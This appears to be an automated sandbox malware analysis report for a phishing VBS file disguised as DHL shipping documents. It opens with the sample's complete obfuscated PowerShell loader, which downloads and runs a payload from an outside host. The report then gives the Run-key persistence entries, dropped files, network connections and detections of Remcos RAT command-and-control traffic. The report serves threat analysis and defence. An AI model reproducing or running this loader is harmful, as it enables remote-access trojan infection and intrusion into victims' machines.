Get-ChildItem;Get-Service;$Decadic=(gcm A:).CommandType;$Decadic=[String]$Decadic;$Clamative='Saddelgjorde';$Decadic+=':';(n`i -p $Decadic -n Septuagenarianism -value { param ($Minimeringer);$Clamative='Polyunsaturate253';$Hjtideligholdt143=3;$Plumbate='Epicentre';do {$Fjernkendingerne+=$Minimeringer[$Hjtideligholdt143];$Hjtideligholdt143+=4} until(!$Minimeringer[$Hjtideligholdt143])$Fjernkendingerne});(n`i -p $Decadic -n Chivalry -value {param ($Disorganise);.($Wickerworked) ($Disorganise)});ConvertTo-Html;$Bagholdene=Septuagenarianism 'PalNI deReoT ed.UngW';$Bagholdene+=Septuagenarianism 'EkseKnaBArsc UnLSmaIMicEPe,nK mt';$Pebrine=Septuagenarianism ' SaMK mo tazStaimodlen lMitaSem/';$Skattedepartementerne=Septuagenarianism 'Co,TPjklHe scen1 it2';$Lynfryser='Nar[ RanDemeKo TNoe.Ants eEPror PavDomiRs.c ee.elP ,jOBesI atNbegtPolMSh a FeN,ruaEl.gA.tERhiRBiu]Bet:Los:FinSKemeOveCMe,U Kor PaIS lTHusYSp P Srr aiOHettGafO ac M oBlal tr= ug$KanSMulK T aSuitunsTNe e .ed oE PaPM naEphRRedTN.keVr.M NeE anN SiTS aeLayrLasn.onE';$Pebrine+=Septuagenarianism 'Com5 ko.Ci 0 Re Job(YenW imiRenn G d Goo H,wSvesUdv CidN urT S M t1Fil0Pos.Erh0 N.;bep ,uW G.iIndnMo 6Cle4Sk ; nh Syvx ,l6Tvr4Fna;Not NarrErovKom:Bev1Hap3.el7Jas. Op0 Un) E. Ov,GCr,eforc ZekGynokon/Oms2Fi 0fru1E.e0Pe.0 ,h1Ki,0,il1Ald KraF NeiPrirRe,eKrifAn,o orxuni/ Hy1Teg3Skr7Fab.Pel0';$Loaferish209=Septuagenarianism 'C rULegS tueSrsrBl -PsyASymg haeBlnNToat';$Granulomatous=Septuagenarianism ' OkhUndtRgftP opDogs ,o:Akt/Ne,/R.gmBrua ver ovtE tiHjon A sNo m HyaSoutNoieDyrr.atierdaPnepGenrOvei KimOrtaD,f.encc MaoLenmOc,.Ba,bSperM,s/ ypaK,fd Klm Gen .d/SerSGo nGruuTrabTr,nDu.eEucsSc s ule AgsSik.StihReahJorpB w> BahSoltRubtE ep.ous ep:Cir/ A /Pa.sFormHjecF rs arhForiObspEyepGeni Omn ragBoddUndlParhKarlRam.MuscMono Jem Sh/AlmSAnkn .yuP ob L n D ekals HesSpeeCe s Sk.Fugh uhPanp';$Pampsychist=Septuagenarianism 'pal>';$Wickerworked=Septuagenarianism 'spriTraETe.x';$Overjoyousness='Netforbundet';$Mischaracterize='\Blres.Smr';Chivalry (Septuagenarianism 'Cr.$ TjgKyslProoE tbSpyaAfsL.aa:Bior CiE ShGSekisp.nMilAMul9Fod2Hui= Wo$PikEKronPu.vToc:T.paCoupI.pPP eDFinamilTJi,ASti+G,e$PumMSpriLibSSalcrochCenAColRRygaBylcme,TMo,E CiRXaniSkaZ TeE');Chivalry (Septuagenarianism ' um$ SaGC,mLLunoHymb G aLiglUno:PriUBe,nRevd S eK mVI faph,sCroT S a S.TLreISilNGanGFacl .myUns=Pyl$Da G,rgrKina LoNRv,uNskLToloRaeMC aab nTPejOI,tUKasSSpe..opSp,lPArglFl IAl.t Co(Pa $Yi.pDi AFl.MHeap U,s.leY Tecukrh VeI ySPactHys)');Chivalry (Septuagenarianism $Lynfryser);$Granulomatous=$Undevastatingly[0];$foveation=(Septuagenarianism 'Pol$Epig ulYieOR ebWieA W LUko:c cV MaiIntsSteiCroT ElE.alRDeneP nTSkj=.asN cET rWNea- hioinaB KajAmaE ElCDratHa. DroSDelYNe snottSorE ,imdel. St$MamB pra baGP nhUnfOD sLkrodDe eLinN,rye');Chivalry ($foveation);Chivalry (Septuagenarianism 'U,d$ PoVUngilinsP siDi tGlaePrirMileTekt Be.LufHDagebssa ,idUnse V,rslasInf[ ro$ roL Tho M a EufCloeStjrNi iNdlsU fh Bo2 r0Ar,9A h]fo = P $BobPG nePenbG.drMiriEngn,nde');$Anetts=Septuagenarianism 'FilDP ao.arwDetn .elIn oVanaUnfdTraFCa iOpsl Pre';$Jewbird=Septuagenarianism ' Sm$ .eVFo.iG.tsunpiInttBioeAnlrPlueAtltsar.Phi$B sAPosn uteS rt A,t Ins Un. S IAlsnEp v hooEcdk.unePro( Ov$Ki GGigrBrnaMixnTouuUnplhikoMi mD maSkotAu oUdvu rosLa ,una$HypRGreeBurpAagrOpfoad dDgeuligc LotEksoAnnrSamyDov)';$Reproductory=$Regina92;Chivalry (Septuagenarianism ' a$Re GAnelF eoUniB ReAL.zlCat: VePSikeCo.r I NOp i eeT Jar SmIDeocUnd=Daw(UnrTSt.eConsOpstB d-TyrPS iaWe THomhJac tj$MesrSupEHelPpolrM do .dD fkupriCMadtBlyo UlRBray A.)');while (!$pernitric) {Chivalry (Septuagenarianism ' la$ BlgA olRado yebUroaGajlAlk:bidADelx Sketa mPr,e ThnD,v=.pr$ColROkaoMisoMermPuns') ;Chivalry $Jewbird;Chivalry (Septuagenarianism ' ma[UnaTSanh emrIn,e FlA rsD KuIPhoNUr.g Ot.IniTNoohUn r.areScoAS ld ra]Fre:Uig:A rsan.L L,eAlge OpPUbi(ham4Fej0Tig0 ra0.ar)');Chivalry (Septuagenarianism ' Op$Sjag ,uLsjlOBetbVu ABilLUn.:Womp Y.E Smr Pen leIDostFljr UnIScocBig= l(etpT .aEGreS hat Aw-Uk.pPo.aReht,elHSys Pul$ EpRCh EConpBairSeao GuD V UBilCO etCaiokvgR okY .e)') ;Chivalry (Septuagenarianism ' po$Ba.GAnoLYdeOFa bSkoa igLpez:A ahproVBraIC sd AgeprmrPennEngeLan=Pl $apnGCo,L JaoKitBBagaPe LNon:GabT.tieK lrDusRBeaOL wrM,lRTane ovg KnISpuMBe EUpcNS aTMiseBiotagn1Hie4 Co4B t+End+Beb%fra$ anu PrnTrndF.kepr,V HaaRets.retSilaKakt ReiN nNTidgF rLFlaY.bd.In CBaloHiruT,sn.avt') ;$Granulomatous=$Undevastatingly[$Hviderne]}$Cannonry=380548;$Forstaaelsesrammerne=30204;Chivalry (Septuagenarianism 'Usp$ vigK plGraO.akBSkuAHjeLGum:U,su UnNfdsIKorNPrifkileMorrW saSunBp klDefY Un tra=S.l FluG SoenootD a-IceC eoCobNRomT SwEm.gNUd,tNat Uni$,reRLs.E RaP var nvoFatDBrouTilcUncTAleOpleRSynY');Chivalry (Septuagenarianism ' S $ sygDeul FeoHjebOutaRunlU.p: elOU,tvStre.ilrShidStunSeag nte Nis Le syn=Bea La.[ FiS DeyCats S tBiteSkrm,ri.UnpC,oroHrenGnivMole emrRebtTun]For:Rab:TraFIntrOveo omBalBResaTmmsPe.e ,k6Maa4,elS Int alrTiliBevnAn gGi (Vin$Te UKapnStaiStyn VofSpae BlrMa,a HubInflFo yNi.)');Chivalry (Septuagenarianism 'Sel$LatGvveLTa.OIntB traBa LH l: TvHCrovBi iG orArvV rlEkse DeRSew ,o=Udl ul[ N s.crYaraSBa t IneT mM o. ElT ,eeHa X DotCor.Be eFirnSimcMaxoSkrd.riiSenNCabGPa,] S.:gri:Prea ApsAspc coiV nIJou.BaggSureAd.tV nSSolT.niRVa IGaln erG yr(int$P rOMusVAfrEMa,rCanD GoNBalgJocEH xs Ka)');Chivalry (Septuagenarianism 'F i$Jaig OplI eo .hbReba .clGl,:SupEsknkGuns DiTTrarSamaT nASnoRterBEveeRevJSvuDJibeL.ar ilnLepET rsNon2P,n4Bet9Une=Ste$Ka hObsv pI atrLasvDobldise anRTon.DehsLemuFreBTrfS.uatFlurS iiMe.NSamGGro(Pre$StrcAbiaSednMedn PaoLudN pRUdsy Ma,ni $UdrfFreO SuRarbS ,ttDifA RaADivEJ nl iaSReteUnas UnRAr alummSliMU oeS arBenN .dEswa)');Chivalry $Ekstraarbejdernes249;
(PID) Process:(5260) msiexec.exeKey:HKEY_CURRENT_USER\Environment
Operation:writeName:Tilbagebetaling37
Value:
c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
(PID) Process:(7012) reg.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:Pridingly
Value:
%Tilbagebetaling37% -windowstyle 2 $Trihedral=(g`p 'HKCU:\Software\Civilbeskyttelsernes\').'Bagsmkkerne';%Tilbagebetaling37% ($Trihedral)
(PID) Process:(5260) msiexec.exeKey:HKEY_CURRENT_USER\SOFTWARE\samnetgtso-ZGKM98
Operation:writeName:exepath
Value:
5EC8481008E163B3F65B0D2FAC69D480EDA67F188AD0FE0D4B488546F222B8B5283FD2EF44AE5CCB2C0E00F0F65471C36C9B3F755AF2AB60B92DA6F26DC9CE0B
(PID) Process:(5260) msiexec.exeKey:HKEY_CURRENT_USER\SOFTWARE\samnetgtso-ZGKM98
Operation:writeName:licence
Value:
10F2AFF966FEEDCC259D1F71DB59E1A9
(PID) Process:(5260) msiexec.exeKey:HKEY_CURRENT_USER\SOFTWARE\samnetgtso-ZGKM98
Operation:writeName:time
Value:
Executable files
0
Suspicious files
6
Text files
9
Unknown types
0

Dropped files

PID
Process
Filename
Type
2384powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:C319A4E97C0E1A13188242197B7D90C7
SHA256:06B55A473E1A80B8F881F3941B637648B3BD02884926B5CE15EA22FC75FD4A77
5260msiexec.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751binary
MD5:E192462F281446B5D1500D474FBACC4B
SHA256:F1BA9F1B63C447682EBF9DE956D0DA2A027B1B779ABEF9522D347D3479139A60
4976powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_baoevh11.hm1.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3888powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_kcu0njrb.ueb.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3888powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ktrwsnqv.uar.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3888powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCachebinary
MD5:8E7D26D71A1CAF822C338431F0651251
SHA256:495E7C4588626236C39124CCE568968E874BEDA950319BA391665B43DE111084
4976powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_snl3o1r0.4wk.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5260msiexec.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751binary
MD5:5CE75284941856F796246F5AC9AD2654
SHA256:3F1D65E58756FB57615D14A33506B37CD17544D4EDB913003B379814F14C2F7D
5260msiexec.exeC:\Users\admin\AppData\Roaming\lausonspt.datbinary
MD5:CEF3190D2CC35103A03CBB7C0644F87E
SHA256:2FD7685F418C6ED052D4B4F8D0B5E0888FF1BE5B98C1144C076D3DA1C376615A
5260msiexec.exeC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\json[1].jsonbinary
MD5:67E0D0DB93D7A6C2E59C1AB5B0243B66
SHA256:882565B0B72D3EF8BC5A291A0D6724637B05FDAE81D981066737139B9049A589
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
8
TCP/UDP connections
28
DNS requests
20
Threats
4

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
23.216.77.18:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
5496
MoUsoCoreWorker.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
6544
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
6112
SIHClient.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
5260
msiexec.exe
GET
200
2.19.105.127:80
http://x1.c.lencr.org/
unknown
whitelisted
6112
SIHClient.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
5260
msiexec.exe
GET
200
178.237.33.50:80
http://geoplugin.net/json.gp
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2104
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:137
whitelisted
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
23.216.77.18:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
5496
MoUsoCoreWorker.exe
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
4
System
192.168.100.255:138
whitelisted
2112
svchost.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
3216
svchost.exe
172.211.123.250:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
2384
powershell.exe
177.53.143.68:443
martinsmateriaprima.com.br
Brasil Site Informatica LTDA
BR
unknown

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 20.73.194.208
  • 4.231.128.59
  • 51.104.136.2
whitelisted
google.com
  • 142.250.185.78
whitelisted
crl.microsoft.com
  • 23.216.77.18
  • 23.216.77.41
  • 23.216.77.25
  • 23.216.77.35
  • 23.216.77.26
  • 23.216.77.28
  • 23.216.77.30
  • 23.216.77.13
  • 23.216.77.29
whitelisted
www.microsoft.com
  • 23.35.229.160
  • 2.23.246.101
whitelisted
client.wns.windows.com
  • 172.211.123.250
whitelisted
martinsmateriaprima.com.br
  • 177.53.143.68
unknown
login.live.com
  • 40.126.32.138
  • 40.126.32.133
  • 20.190.160.65
  • 40.126.32.76
  • 20.190.160.130
  • 20.190.160.131
  • 20.190.160.64
  • 20.190.160.22
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
slscr.update.microsoft.com
  • 20.109.210.53
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 13.85.23.206
whitelisted

Threats

PID
Process
Class
Message
2196
svchost.exe
Potentially Bad Traffic
ET DYN_DNS DYNAMIC_DNS Query to a *.duckdns .org Domain
2196
svchost.exe
Misc activity
ET DYN_DNS DYNAMIC_DNS Query to *.duckdns. Domain
5260
msiexec.exe
Malware Command and Control Activity Detected
ET MALWARE Remcos 3.x Unencrypted Server Response
5260
msiexec.exe
Malware Command and Control Activity Detected
ET MALWARE Remcos 3.x Unencrypted Checkin
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
awb_DHL_Shipping_documents_delivery_26_05_2025_0000000000000_doc_25.vbs